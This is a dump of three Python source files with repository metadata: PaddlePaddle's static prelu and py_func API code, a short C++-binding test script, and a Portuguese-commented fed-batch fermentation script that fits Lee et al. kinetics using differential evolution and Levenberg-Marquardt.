"use_mkldnn": False,
"fuse_with_relu": False,
"use_global_stats": use_global_stats,
}
if isinstance(momentum, paddle.static.Variable):
inputs['MomemtumTensor'] = momentum
else:
attrs['momentum'] = momentum
outputs = {
"Y": batch_norm_out,
"MeanOut": mean_out,
"VarianceOut": variance_out,
"SavedMean": saved_mean,
"SavedVariance": saved_variance,
}
if reserve_space is not None:
outputs["ReserveSpace"] = reserve_space
helper.append_op(
type="batch_norm", inputs=inputs, outputs=outputs, attrs=attrs
)
return helper.append_activation(batch_norm_out)
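# --- NumPy reference sketch of the batch_norm equations above (training mode, NCHW) ---
# Purely illustrative; names are hypothetical and this is not how the op is implemented.
import numpy as np
def _example_batch_norm_reference(x, gamma, beta, moving_mean, moving_var,
                                  momentum=0.9, epsilon=1e-5):
    # x: [N, C, H, W]; per-channel statistics are taken over the N, H, W axes.
    mean = x.mean(axis=(0, 2, 3))
    var = x.var(axis=(0, 2, 3))
    x_hat = (x - mean[None, :, None, None]) / np.sqrt(var[None, :, None, None] + epsilon)
    y = gamma[None, :, None, None] * x_hat + beta[None, :, None, None]
    new_mean = moving_mean * momentum + mean * (1.0 - momentum)   # running-mean update
    new_var = moving_var * momentum + var * (1.0 - momentum)      # running-variance update
    return y, new_mean, new_var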
@static_only
def prelu(x, mode, param_attr=None, data_format="NCHW", name=None):
r"""
prelu activation.
.. math::
prelu(x) = max(0, x) + \alpha * min(0, x)
There are three modes for the activation:
.. code-block:: text
all: All elements share same alpha.
channel: Elements in same channel share same alpha.
element: All elements do not share alpha. Each element has its own alpha.
Parameters:
x (Tensor): The input Tensor or LoDTensor with data type float16, float32 or float64.
mode (str): The mode for weight sharing.
param_attr (ParamAttr|None, optional): The parameter attribute for the learnable \
weight (alpha), it can be create by ParamAttr. None by default. \
For detailed information, please refer to :ref:`api_paddle_ParamAttr`.
data_format(str, optional): Data format that specifies the layout of input.
It may be "NC", "NCL", "NCHW", "NCDHW", "NLC", "NHWC" or "NDHWC". Default: "NCHW".
name (str, optional): Name for the operation (optional, default is None). \
For more information, please refer to :ref:`api_guide_Name`.
Returns:
Tensor: A tensor with the same shape and data type as x.
Examples:
.. code-block:: python
import paddle
paddle.enable_static()
x = paddle.static.data(name="x", shape=[None,5,10,10], dtype="float32")
mode = 'channel'
output = paddle.static.nn.prelu(
x,mode,param_attr=paddle.ParamAttr(name='alpha'))
"""
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], 'prelu')
helper = LayerHelper('prelu', **locals())
if mode not in ['all', 'channel', 'element']:
raise ValueError('mode should be one of all, channel, element.')
alpha_shape = [1]
if mode == 'channel':
true_data_format = [
'NC',
'NCL',
'NCHW',
'NCDHW',
'NLC',
'NHWC',
'NDHWC',
]
if data_format not in true_data_format:
raise ValueError(
"data_format must be one of 'NC', 'NCL', 'NCHW', 'NCDHW', "
"'NLC', 'NHWC', 'NDHWC' but receive {}".format(data_format)
)
data_format = 'NCHW' if data_format[1] == 'C' else 'NHWC'
assert (
len(x.shape) >= 2
), "The size of input shape should be equal or larger than 2 in prelu() when mode is 'channel'"
# NOTE(zhiqiu): The alpha_shape should be [1, channel] + [1] * len(x.shape[2:]).
# To be consistent with Prelu, it is simplified.
# NOTE(zhiqiu): Revert shape to [1, channel, 1, 1] for compatibility with saved model of old version.
# NOTE(GuoxiaWang): support NHWC data format
if data_format == 'NHWC':
alpha_shape = [1, 1, 1, x.shape[-1]]
else:
alpha_shape = [1, x.shape[1], 1, 1]
elif mode == 'element':
assert (
len(x.shape) >= 1
), "The size of input shape should be equal or larger than 1 in prelu() when mode is 'element'"
alpha_shape = [1] + list(x.shape)[1:]
dtype = helper.input_dtype(input_param_name='x')
alpha = helper.create_parameter(
attr=helper.param_attr,
shape=alpha_shape,
dtype=dtype,
is_bias=False,
default_initializer=paddle.nn.initializer.Constant(0.25),
)
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type="prelu",
inputs={"X": x, 'Alpha': alpha},
attrs={"mode": mode, "data_format": data_format},
outputs={"Out": out},
)
return out
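# --- NumPy reference sketch of the prelu formula above (illustrative only) ------------
# `alpha` must broadcast against `x`: a scalar for mode 'all', shape [1, C, 1, 1] for
# mode 'channel' with NCHW data, or the full per-element shape for mode 'element'.
import numpy as np
def _example_prelu_reference(x, alpha):
    return np.maximum(0, x) + alpha * np.minimum(0, x)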
class PyFuncRegistry:
_register_funcs = []
def __init__(self, func):
if func is None or not callable(func):
raise TypeError('func must be a Python function')
self._func = func
# find named args using reflection
args = inspect.getfullargspec(self._func)
if len(args[0]) == 0 and args[1] is None and args[2] is None:
# Function with no inputs
self._named_args = None
else:
self._named_args = args[0]
self._id = core._append_python_callable_object_and_return_id(self)
'''
Why record self here?
1. For debug usage. Users can call
:code:`py_func.registered_func(idx)` method
to find the registered function corresponding
to :code:`idx`.
2. For increasing reference count of self.
Releasing a Python object whose reference count
is 1 seems to cause a segmentation fault
on the C++ side, possibly because the C++ side
does not take part in Python garbage collection.
'''
PyFuncRegistry._register_funcs.append(self)
@classmethod
def registered_func(cls, idx):
return cls._register_funcs[idx]._func
@classmethod
def registered_func_num(cls):
return len(cls._register_funcs)
@property
def id(self):
return self._id
def __call__(self, *args):
if self._named_args is None:
func_ret = self._func()
else:
kwargs = dict()
idx = 0
for arg in self._named_args:
kwargs[arg] = args[idx]
idx += 1
func_ret = self._func(*args[idx:], **kwargs)
if not isinstance(func_ret, (list, tuple)):
func_ret = (func_ret,)
ret = []
for each_ret in func_ret:
if each_ret is None or isinstance(each_ret, core.LoDTensor):
ret.append(each_ret)
continue
if not isinstance(each_ret, np.ndarray):
each_ret = np.array(each_ret)
tensor = core.LoDTensor()
tensor.set(each_ret, core.CPUPlace())
ret.append(tensor)
return tuple(ret)
@static_only
@templatedoc()
def py_func(func, x, out, backward_func=None, skip_vars_in_backward_input=None):
"""
This is used to register a customized Python OP to Paddle. The design
principle of py_func is that Tensors and numpy arrays can be converted to each
other easily, so you can use Python and numpy APIs to register a Python OP.
The forward function of the registered OP is ``func`` and the backward function
of that is ``backward_func``. Paddle will call ``func`` at forward runtime and
call ``backward_func`` at backward runtime(if ``backward_func`` is not None).
``x`` is the input of ``func``, whose type must be Tensor; ``out`` is
the output of ``func``, whose type can be either Tensor or numpy array.
The input of the backward function ``backward_func`` is ``x``, ``out`` and
the gradient of ``out``. If ``out`` has no gradient, the relevant input of
``backward_func`` is None. If ``x`` does not have a gradient, the user should
return None in ``backward_func``.
The data type and shape of ``out`` should also be set correctly before this
API is called, and the data type and shape of the gradient of ``out`` and
``x`` will be inferred automatically.
This API can also be used to debug the neural network by setting the ``func``
as a function that only print variables.
Args:
func (callable): The forward function of the registered OP. When the network
is running, the forward output ``out`` will be calculated according to this
function and the forward input ``x``. In ``func``, it is suggested to
actively convert the Tensor into a numpy array, so that Python and numpy
APIs can be used freely; otherwise, some numpy operations may not work as expected.
x (Tensor|tuple(Tensor)|list[Tensor]): The input of the forward function ``func``.
It can be Tensor|tuple(Tensor)|list[Tensor]. In addition, Multiple Tensor
should be passed in the form of tuple(Tensor) or list[Tensor].
out (T|tuple(T)|list[T]): The output of the forward function ``func``, it can be
T|tuple(T)|list[T], where T can be either Tensor or numpy array. Since Paddle
cannot automatically infer the shape and type of ``out``, you must create
``out`` in advance.
backward_func (callable, optional): The backward function of the registered OP.
Its default value is None, which means there is no reverse calculation. If
it is not None, ``backward_func`` is called to calculate the gradient of
``x`` when the network is at backward runtime.
skip_vars_in_backward_input (Tensor, optional): It's used to limit the input
list of ``backward_func``, and it can be Tensor|tuple(Tensor)|list[Tensor].
It must belong to either ``x`` or ``out``. The default value is None, which means
that no tensors need to be removed from ``x`` and ``out``. If it is not None,
these tensors will not be the input of ``backward_func``. This parameter is only
useful when ``backward_func`` is not None.
Returns:
Tensor|tuple(Tensor)|list[Tensor]: The output ``out`` of the forward function ``func``.
Examples:
.. code-block:: python
# example 1:
import paddle
import numpy as np
paddle.enable_static()
# Creates a forward function, Tensor can be input directly without
# being converted into numpy array.
def tanh(x):
return np.tanh(x)
# Skip x in backward function and return the gradient of x
# Tensor must be actively converted to numpy array, otherwise,
# operations such as +/- can't be used.
def tanh_grad(y, dy):
return np.array(dy) * (1 - np.square(np.array(y)))
# Creates a forward function for debugging running networks(print value)
def debug_func(x):
print(x)
def create_tmp_var(name, dtype, shape):
return paddle.static.default_main_program().current_block().create_var(
name=name, dtype=dtype, shape=shape)
def simple_net(img, label):
hidden = img
for idx in range(4):
hidden = paddle.static.nn.fc(hidden, size=200)
new_hidden = create_tmp_var(name='hidden_{}'.format(idx),
dtype=hidden.dtype, shape=hidden.shape)
# User-defined forward and backward
hidden = paddle.static.py_func(func=tanh, x=hidden,
out=new_hidden, backward_func=tanh_grad,
skip_vars_in_backward_input=hidden)
# User-defined debug functions that print out the input Tensor
paddle.static.py_func(func=debug_func, x=hidden, out=None)
prediction = paddle.static.nn.fc(hidden, size=10, activation='softmax')
ce_loss = paddle.nn.loss.CrossEntropyLoss()
return ce_loss(prediction, label)
x = paddle.static.data(name='x', shape=[1,4], dtype='float32')
y = paddle.static.data(name='y', shape=[1], dtype='int64')
res = simple_net(x, y)
exe = paddle.static.Executor(paddle.CPUPlace())
exe.run(paddle.static.default_startup_program())
input1 = np.random.random(size=[1,4]).astype('float32')
input2 = np.random.randint(1, 10, size=[1], dtype='int64')
out = exe.run(paddle.static.default_main_program(),
feed={'x':input1, 'y':input2},
fetch_list=[res.name])
print(out)
.. code-block:: python
# example 2:
# This example shows how to turn Tensor into numpy array and
# use numpy API to register an Python OP
import paddle
import numpy as np
paddle.enable_static()
def element_wise_add(x, y):
# Tensor must be actively converted to numpy array, otherwise,
# numpy.shape can't be used.
x = np.array(x)
y = np.array(y)
if x.shape != y.shape:
raise AssertionError("the shape of inputs must be the same!")
result = np.zeros(x.shape, dtype='int32')
for i in range(len(x)):
for j in range(len(x[0])):
result[i][j] = x[i][j] + y[i][j]
return result
def create_tmp_var(name, dtype, shape):
return paddle.static.default_main_program().current_block().create_var(
name=name, dtype=dtype, shape=shape)
def py_func_demo():
start_program = paddle.static.default_startup_program()
main_program = paddle.static.default_main_program()
# Input of the forward function
x = paddle.static.data(name='x', shape=[2,3], dtype='int32')
y = paddle.static.data(name='y', shape=[2,3], dtype='int32')
# Output of the forward function, name/dtype/shape must be specified
output = create_tmp_var('output','int32', [3,1])
# Multiple Tensor should be passed in the form of tuple(Tensor) or list[Tensor]
paddle.static.py_func(func=element_wise_add, x=[x,y], out=output)
exe=paddle.static.Executor(paddle.CPUPlace())
exe.run(start_program)
# Feed numpy array to main_program
input1 = np.random.randint(1, 10, size=[2,3], dtype='int32')
input2 = np.random.randint(1, 10, size=[2,3], dtype='int32')
out = exe.run(main_program,
feed={'x':input1, 'y':input2},
fetch_list=[output.name])
print("{0} + {1} = {2}".format(input1, input2, out))
py_func_demo()
# Reference output:
# [[5, 9, 9] + [[7, 8, 4] = [array([[12, 17, 13]
# [7, 5, 2]] [1, 3, 3]] [8, 8, 5]], dtype=int32)]
"""
helper = LayerHelper('py_func', **locals())
check_type(x, 'X', (list, tuple, Variable, type(None)), 'py_func')
if x is None:
x = []
elif isinstance(x, Variable):
x = [x]
elif isinstance(x, tuple):
x = list(x)
elif not isinstance(x, (list, tuple, Variable)):
raise TypeError('Input must be Tensor/list(Tensor)/tuple(Tensor)')
check_type(out, 'Out', (list, tuple, Variable, type(None)), 'py_func')
if out is None:
out_list = []
elif isinstance(out, Variable):
out_list = [out]
elif isinstance(out, tuple):
out_list = list(out)
elif isinstance(out, list):
out_list = out
else:
raise TypeError('Output must be Tensor/list(Tensor)/tuple(Tensor)')
fwd_func_id = PyFuncRegistry(func).id
bwd_func_id = (
PyFuncRegistry(backward_func).id if backward_func is not None else -1
)
for each_out in out_list:
if len(each_out.shape) == 0:
raise ValueError(
'Output shapes of py_func should be provided by users manually'
)
backward_skip_vars = set()
if backward_func is not None and skip_vars_in_backward_input is not None:
if isinstance(skip_vars_in_backward_input, Variable):
skip_vars_in_backward_input = [skip_vars_in_backward_input]
fwd_in_out = [v.name for v in x]
fwd_in_out.extend([v.name for v in out_list])
fwd_in_out = set(fwd_in_out)
backward_skip_vars = set()
for v in skip_vars_in_backward_input:
if v.name not in fwd_in_out:
raise ValueError(
'Tensor {} is not found in forward inputs and outputs'.format(
v.name
)
)
backward_skip_vars.add(v.name)
helper.append_op(
type='py_func',
inputs={'X': x},
outputs={'Out': out_list},
attrs={
'forward_callable_id': fwd_func_id,
'backward_callable_id': bwd_func_id,
'backward_skip_vars': list(backward_skip_vars),
},
)
return out
# For debug usage
py_func.registered_func = PyFuncRegistry.registered_func
py_func.registered_func_num = PyFuncRegistry.registered_func_num
|
[
"noreply@github.com"
] |
chenwhql.noreply@github.com
|
80446453507804feccaab2b1c877c8202883ba81
|
20daf183a06760a61dfb0e0269050659f7fc21e5
|
/cmake_笔记/cmake_生成动态链接库/pytest.py
|
f0081263703b13e6212a9982ec1601bc92355dd2
|
[] |
no_license
|
qiuzhuangshandian/SmallTools
|
d2205b1c9eed9943a14ac9cb18a6d63d1d65f24a
|
026eedcf2b3d1d32753892ea49993a854870d1c2
|
refs/heads/master
| 2022-02-14T10:34:19.284676
| 2021-12-29T08:23:33
| 2021-12-29T08:23:33
| 129,028,808
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 381
|
py
|
from pyfunc import sayhello,testfunc,convfunc
import numpy as np
X= [[0, 1, 2], [3, 4, 5], [6, 7, 8]]
K = [[1, 1], [1, 1]]
X_np = np.array(X).astype(np.int32) # Note: the argument dtypes must match the parameter types of the C++ function
K_np = np.array(K).astype(np.int32)
result = np.zeros(shape=[4,4]).astype(np.int32)
sayhello()
testfunc(X_np,3)
convfunc(X_np,K_np,result,2,2,3,3)
|
[
"noreply@github.com"
] |
qiuzhuangshandian.noreply@github.com
|
1f8c7106b72a53e8bdc19e6d5d0048f0f20df93a
|
66167c31e42dd2c642557c6b58e599a84d504229
|
/Batelada_Alimentada/Modelagem/Alimentacao_Taxa_Constante/Inibicao_pela_Biomassa/Modelag_ag_alm_bat_alim_vaz_const_Lee_et_al_corrigido.py
|
377375a5b688f7f0e1fa39a210213314d00ee02b
|
[] |
no_license
|
BrunaAQ/Projeto_Iniciacao_Cientifica_FAPESP
|
ab26a299fd7718f53b405bf73e962094679694d5
|
6a9131ad90ce095c8863c76370b6238f9585ec95
|
refs/heads/master
| 2023-03-17T19:22:09.925701
| 2021-03-09T18:15:27
| 2021-03-09T18:15:27
| 276,701,946
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 23,341
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Thu Nov 12 17:02:12 2020
@author: Bruna Aparecida
"""
## MODELAGEM BATELADA ALIMENTADA À VAZÃO CONSTANTE CINÉTICA DE LEE ET AL ##
# Importação das bibliotecas necessárias para as partes não modulares:
import Modulos_Lee_et_al_bat_alim
import Modulo_peso_limite_AG
from scipy.integrate import odeint
import matplotlib.pyplot as plt
import numpy as np
from scipy.optimize import differential_evolution
from scipy.optimize import leastsq
import scipy.stats as sc
import pandas as pd
import time
## Separação do processo em batelada (etapa 1) e batelada alimentada (etapa 2):
# PRIMEIRO PASSO: simulação de dados para Cx, Cs e Cp:
#*ETAPA 1*# - BATELADA
## Módulos:
### Valores dos parâmetros do modelo e condição inicial:
dad_entr_geral = Modulos_Lee_et_al_bat_alim.entr_Lee_et_al()
## Valor de entrada dos parâmetros cinéticos
pars_entr = dad_entr_geral[0]
mimaximo = pars_entr[0]
Ks = pars_entr[1]
Yxs = pars_entr[7]
alfa = pars_entr[8]
beta = pars_entr[9]
m = pars_entr[10]
Cx_estr = pars_entr[11]
## Integração numérica (sistema de EDOs):
def bat_Lee_et_al(Concent,t_exp_bat):
Cx,Cs,Cp = Concent
mi = mimaximo*((Cs/(Ks+Cs))*((abs(1-(Cx/Cx_estr)))**m))
dCxdt = mi*Cx
dCsdt = (-1/Yxs)*mi*Cx
dCpdt = alfa*mi*Cx+beta*Cx
return(dCxdt,dCsdt,dCpdt)
### Condições de integração:
cond_inic_bat = dad_entr_geral[1]
t_exp_bat = dad_entr_geral[2]
### Matriz de retorno:
C_exp_bat = odeint(bat_Lee_et_al, cond_inic_bat, t_exp_bat)
#*ETAPA 2*# - BATELADA ALIMENTADA
## Módulos:
### Valores dos parâmetros operacionais e condição inicial:
param_oper_alim = dad_entr_geral[3]
Cs0_corrent_alim = param_oper_alim[0]
V0 = param_oper_alim[2]
Vf = param_oper_alim[3]
Q = param_oper_alim[4]
## Integração numérica (sistema de EDOs):
def bat_alim_Lee_et_al(Concent,t_exp_alim):
Cx,Cs,Cp = Concent
mi = mimaximo*((Cs/(Ks+Cs))*((abs(1-(Cx/Cx_estr)))**m))
D = Q/(V0+Q*t_exp_alim)
dCxdt = (mi-D)*Cx
dCsdt = D*(Cs0_corrent_alim-Cs)-((mi*Cx)/Yxs)
dCpdt = D*(Cp0_alim-Cp)+Cx*(beta+alfa*mi)
return(dCxdt,dCsdt,dCpdt)
### Condições de integração:
#### Condição inicial - Valores finais da batelada vão ser os iniciais da batelada alimentada:
Cx0_alim = C_exp_bat[:,0][len(C_exp_bat[:,0])-1]
Cs0_alim = C_exp_bat[:,1][len(C_exp_bat[:,1])-1]
Cp0_alim = C_exp_bat[:,2][len(C_exp_bat[:,2])-1]
cond_inic_alim = [Cx0_alim, Cs0_alim, Cp0_alim]
t_exp_alim = dad_entr_geral[4]
### Matriz de retorno:
C_exp_alim = odeint(bat_alim_Lee_et_al, cond_inic_alim, t_exp_alim)
# SEGUNDO PASSO: aplicar a modelagem por acoplamento AG-ALM:
# Início da contagem do tempo de convergência computacional:
start_tempo = time.time()
#*ETAPA 1*# - BATELADA
##*Algoritmo Genético (global)*##
# Módulos
## Função com as equações modelo com os parâmetros atribuídos a argumentos:
func_args_bat = Modulos_Lee_et_al_bat_alim.modelag_bat_Lee_et_al_func_args()
## Atribuição de pesos a Cx, Cs e Cp para a modelagem (tendência de convergência - ideia de prioridade):
dpC = Modulo_peso_limite_AG.peso()
## Função objetiva, compara os pontos experimentais com o sistema cinético adotado:
def func_obj_ag_bat(parametros, *dados):
t_exp,C_exp = dados
p = tuple(parametros)
C_sim = odeint(func_args_bat, cond_inic_bat, t_exp_bat, args = p)
res = C_sim - C_exp
for i in range(0,3):
res[:,i] = res[:,i]/dpC[i]
res = res.flatten()
res = sum(res**2)
return res
## Importação dos bounds para aplicação do AG:
limites_Lee_et_al = Modulo_peso_limite_AG.limites()[8]
# Definição dos argumentos:
args = (t_exp_bat,C_exp_bat)
resultado_ag_bat = differential_evolution(func_obj_ag_bat, limites_Lee_et_al, args=args, popsize=5, tol=0.01, mutation=(0.5, 1), recombination=0.7, updating='immediate')
resultado_ag_bat = resultado_ag_bat.x
resultado_ag_bat = tuple(resultado_ag_bat)
##*Algoritmo de Levenberg-Marquardt (local)*##
## Função objetiva para o ALM:
def func_obj_alm_bat(p):
p = tuple(p)
C_sim_bat = odeint(func_args_bat,cond_inic_bat,t_exp_bat,args=p)
res = C_sim_bat - C_exp_bat
for i in range(0,3):
res[:,i]=res[:,i]/dpC[i]
return res.flatten()
## Minimização da função objetiva pela função leastsq:
lance_inic_bat = [resultado_ag_bat]
resultado_alm_bat = leastsq(func_obj_alm_bat,lance_inic_bat, args=(), Dfun=None, full_output=1)
param_otim_alm_bat = resultado_alm_bat[0]
'''
## Cálculo do intervalo de confiança (I.C.) correspondente:
res_otimo_bat = resultado_alm_bat[2]['fvec']
sensT_otimo_bat =resultado_alm_bat[2]['fjac']
npar_bat = len(sensT_otimo_bat[:,1])
ndata_bat = len(sensT_otimo_bat[1,:])
invXtX_bat = np.linalg.inv(np.matmul(sensT_otimo_bat,sensT_otimo_bat.transpose()))
sig2y_bat = sum(res_otimo_bat**2) / (ndata_bat-npar_bat)
covparamers_bat = invXtX_bat*sig2y_bat
EPpar_bat = np.sqrt(covparamers_bat.diagonal())
ICpar_bat = EPpar_bat*sc.t.interval(.95, ndata_bat-npar_bat, loc=0, scale=1)[1]
'''
## Armazenamento dos parâmetros otimizados em tuplas:
param_otim_alm_bat = tuple(param_otim_alm_bat)
## Tempo modelo:
t_bat = np.arange(0, t_exp_bat[-1], 0.1)
## Integrando com os valores dos parâmetros ajustados:
C_otim_bat = odeint(func_args_bat, cond_inic_bat, t_bat, args = (param_otim_alm_bat))
#*ETAPA 2*# - BATELADA ALIMENTADA
##*Algoritmo Genético (global)*##
# Função com as equações modelo com os parâmetros atribuídos a argumentos:
def func_args_alim(C, t_exp_alim, *args):
mimaximo = args[0]
Ks = args[1]
Yxs = args[2]
alfa = args[3]
beta = args[4]
m = args[5]
Cx_estr = args[6]
mi = mimaximo*((C[1]/(Ks+C[1]))*((abs(1-(C[0]/Cx_estr)))**m))
D = Q/(V0 + Q*t_exp_alim)
dCxdt = (mi - D)*C[0]
dCsdt = D*(Cs0_corrent_alim - C[1]) - ((mi*C[0])/Yxs)
dCpdt = D*(Cp0_alim - C[2]) + C[0]*(beta + alfa*mi)
return(dCxdt,dCsdt,dCpdt)
# Módulos
## Função objetiva, compara os pontos experimentais com o sistema cinético adotado:
def func_obj_ag_alim(parametros, *dados):
t_exp_alim,C_exp_alim = dados
p = tuple(parametros)
C_sim_alim = odeint(func_args_alim, cond_inic_alim, t_exp_alim, args = p)
res = C_sim_alim - C_exp_alim
for i in range(0,3):
res[:,i] = res[:,i]/dpC[i]
res = res.flatten()
res = sum(res**2)
return res
# Definição dos argumentos:
args = (t_exp_alim,C_exp_alim)
resultado_ag_alim = differential_evolution(func_obj_ag_alim, limites_Lee_et_al, args = args, popsize=5, tol=0.01, mutation=(0.5, 1), recombination=0.7, updating='immediate')
resultado_ag_alim = resultado_ag_alim.x
resultado_ag_alim = tuple(resultado_ag_alim)
##*Algoritmo de Levenberg-Marquardt (local)*##
## Função objetiva para o ALM:
def func_obj_alm_alim(p):
p = tuple(p)
C_sim_alim = odeint(func_args_alim,cond_inic_alim,t_exp_alim,args=p)
res = C_sim_alim - C_exp_alim
for i in range(0,3):
res[:,i]=res[:,i]/dpC[i]
return res.flatten()
## Minimização da função objetiva pela função leastsq:
lance_inic_alim= [resultado_ag_alim]
resultado_alm_alim = leastsq(func_obj_alm_alim,lance_inic_alim, args=(), Dfun=None, full_output=1)
param_otim_alm_alim = resultado_alm_alim[0]
'''
## Cálculo do intervalo de confiança (I.C.) correspondente:
res_otimo_alim = resultado_alm_alim[2]['fvec']
sensT_otimo_alim =resultado_alm_alim[2]['fjac']
npar_alim = len(sensT_otimo_alim[:,1])
ndata_alim = len(sensT_otimo_alim[1,:])
invXtX_alim = np.linalg.inv(np.matmul(sensT_otimo_alim,sensT_otimo_alim.transpose()))
sig2y_alim = sum(res_otimo_alim**2) / (ndata_alim-npar_alim)
covparamers_alim = invXtX_alim*sig2y_alim
EPpar_alim = np.sqrt(covparamers_alim.diagonal())
ICpar_alim = EPpar_alim*sc.t.interval(.95, ndata_alim-npar_alim, loc=0, scale=1)[1]
'''
## Armazenamento dos parâmetros otimizados em tuplas:
param_otim_alm_alim = tuple(param_otim_alm_alim)
## Tempo modelo:
t_alim = np.arange(dad_entr_geral[0][6], t_exp_alim[-1], 0.1)
## Integrando com os valores dos parâmetros ajustados:
Cx0_otim_alim = C_otim_bat[:,0][len(C_otim_bat[:,0])-1]
Cs0_otim_alim = C_otim_bat[:,1][len(C_otim_bat[:,1])-1]
Cp0_otim_alim = C_otim_bat[:,2][len(C_otim_bat[:,2])-1]
cond_inic_alim = [Cx0_otim_alim, Cs0_otim_alim, Cp0_otim_alim]
C_otim_alim = odeint(func_args_alim, cond_inic_alim, t_alim, args = (param_otim_alm_alim))
## Parada da contagem do tempo de convergência total:
fim = time.time()
tempo_converg = fim - start_tempo
###***Impressão valores de saída***###
print("____________Saída Geral____________")
# Tempo de convergência requerido:
print("Tempo de modelagem:", tempo_converg, "s")
#*ETAPA 1*#
print("____________Resultados para batelada____________")
print("mimaxixo_bat:",resultado_alm_bat[0][0])#,"+/-",ICpar_bat[0],"(h-1)")
print("Ks_bat:",resultado_alm_bat[0][1])#,"+/-",ICpar_bat[1],"(g/l)")
print("Yxs_bat:",resultado_alm_bat[0][2])#,"+/-",ICpar_bat[2],"(gx/gs)")
print("alfa_bat:",resultado_alm_bat[0][3])#,"+/-",ICpar_bat[3],"(gp/gx)")
print("beta_bat:",resultado_alm_bat[0][4])#,"+/-",ICpar_bat[4],"[gp/(gx.h)]")
print("m_bat:",resultado_alm_bat[0][5])#,"+/-",ICpar_bat[5],"[adimensional]")
print("Cx_estr_bat:",resultado_alm_bat[0][6])#,"+/-",ICpar_bat[5],"[gx/l]")
#*ETAPA 2*#
print("____________Resultados para batelada alimentada____________")
print("mimaxixo_alim:",resultado_alm_alim[0][0])#,"+/-",ICpar_alim[0],"(h-1)")
print("Ks_alim:",resultado_alm_alim[0][1])#,"+/-",ICpar_alim[1],"(g/l)")
print("Yxs_alim:",resultado_alm_alim[0][2])#,"+/-",ICpar_alim[2],"(gx/gs)")
print("alfa_alim:",resultado_alm_alim[0][3])#,"+/-",ICpar_alim[0],"(gp/gx)")
print("beta_alim:",resultado_alm_alim[0][4])#,"+/-",ICpar_alim[0],"[gp/(gx.h)]")
print("m_alim:",resultado_alm_alim[0][5])#"+/-",ICpar_bat[0],"[adimensional]")
print("Cx_estr_bat:",resultado_alm_bat[0][6])#,"+/-",ICpar_bat[5],"[gx/l]")
###***Impressão gráfica***###
## União das matrizes C_exp_bat e C_exp_alim:
#*ETAPA 1*# - BATELADA
Cx_exp_bat = C_exp_bat[:,0]
Cx_bat = C_otim_bat[:,0]
Cs_exp_bat = C_exp_bat[:,1]
Cs_bat = C_otim_bat[:,1]
Cp_exp_bat = C_exp_bat[:,2]
Cp_bat = C_otim_bat[:,2]
#*ETAPA 2*# - BATELADA ALIMENTADA
Cx_exp_alim = C_exp_alim[:,0]
Cx_alim = C_otim_alim[:,0]
Cs_exp_alim = C_exp_alim[:,1]
Cs_alim = C_otim_alim[:,1]
Cp_exp_alim = C_exp_alim[:,2]
Cp_alim = C_otim_alim[:,2]
### Contadores gerais:
#*ETAPA 1*# - BATELADA
limite_bat_exp = len(C_exp_bat)
limite_alim_exp = len(C_exp_alim)
limite_bat = len(C_otim_bat)
limite_alim = len(C_otim_alim)
Cx_exp = []
Cs_exp = []
Cp_exp = []
Cx = []
Cs = []
Cp = []
bat_exp = 0
alim_exp = 0
bat = 0
alim = 0
while (bat_exp < limite_bat_exp):
Cx_exp.append(Cx_exp_bat[bat_exp])
Cs_exp.append(Cs_exp_bat[bat_exp])
Cp_exp.append(Cp_exp_bat[bat_exp])
bat_exp = bat_exp + 1
while (bat < limite_bat):
Cx.append(Cx_bat[bat])
Cs.append(Cs_bat[bat])
Cp.append(Cp_bat[bat])
bat = bat + 1
while (alim_exp < limite_alim_exp):
Cx_exp.append(Cx_exp_alim[alim_exp])
Cs_exp.append(Cs_exp_alim[alim_exp])
Cp_exp.append(Cp_exp_alim[alim_exp])
alim_exp = alim_exp + 1
while (alim < limite_alim):
Cx.append(Cx_alim[alim])
Cs.append(Cs_alim[alim])
Cp.append(Cp_alim[alim])
alim = alim + 1
divisor = len(Cx)
## Vetor tempo total do processo:
Ttotal_exp = np.arange(0,param_oper_alim[1],0.5)
divisor = len(Cx)
Ttotal = np.linspace (0,param_oper_alim[1],divisor)
## Conversão das listas para arrays - necessário para operações matemáticas:
Cx_exp = np.asarray(Cx_exp)
Cs_exp = np.asarray(Cs_exp)
Cp_exp = np.asarray(Cp_exp)
Cx = np.asarray(Cx)
Cs = np.asarray(Cs)
Cp = np.asarray(Cp)
## Exportação dos dados em dataframes:
df_concents = pd.DataFrame({'Tempo(h)': Ttotal_exp, 'Cx_exp(g/L)': Cx_exp, 'Cs_exp(g/L)': Cs_exp, 'Cp_exp(g/L)': Cp_exp})
df_params = pd.DataFrame({'mimáx_sim(h-¹)': [pars_entr[0]],'KSX_sim(gp/gs)': [pars_entr[1]],
'Yxs_sim(gcél/gsubs)': [pars_entr[7]],
'alfa(gprod/gcél)': [pars_entr[8]], 'beta_sim(gprod/gcél.h)': [pars_entr[9]], "m(-)": [pars_entr[10]], "Cx_estr(g/l)": [pars_entr[11]],
"Q(L.h)": [param_oper_alim[4]], "V0(L)": [param_oper_alim[2]], "tf_batelada(h)": [pars_entr[6]],
"Cs0_alim(gs/L)": [param_oper_alim[0]]})
df_saida_lee = pd.concat([df_concents, df_params], axis=1)
with pd.ExcelWriter('Sim_Lee_et_al_alim_const.xlsx') as writer:
df_saida_lee.to_excel(writer, sheet_name="Saída_Lee_et_al_alim_const")
writer.save()
def tam_graf():
# Gráfico batelada e batelada alimentada
SMALL_SIZE = 20
MEDIUM_SIZE = 24
## Comando para determinar o tamanho segundo o qual os textos grafados no gráfico serão impressos na tela:
plt.rc('font', size=SMALL_SIZE)
plt.rc('axes', titlesize=SMALL_SIZE)
plt.rc('axes', labelsize=MEDIUM_SIZE)
plt.rc('xtick', labelsize=SMALL_SIZE)
plt.rc('ytick', labelsize=SMALL_SIZE)
plt.rc('legend', fontsize=SMALL_SIZE)
# Gráfico perfil de concentração:
# Definindo a figura que será gerada - batelada:
tam_graf()
_ = f = plt.figure()
_ = ax = f.add_subplot(111)
_ = lns1 = ax.plot(t_bat,C_otim_bat[:,0], color = "red", linewidth = 3,label ='Cx modelo')
_ = lns2 = ax.plot(t_exp_bat,C_exp_bat[:,0],'o',color = "red",markersize = 6, label = 'Cx experimental')
_ = lns3 = ax.plot(t_bat,C_otim_bat[:,1], linestyle="--", color = "green",linewidth = 3,label = 'Cs modelo')
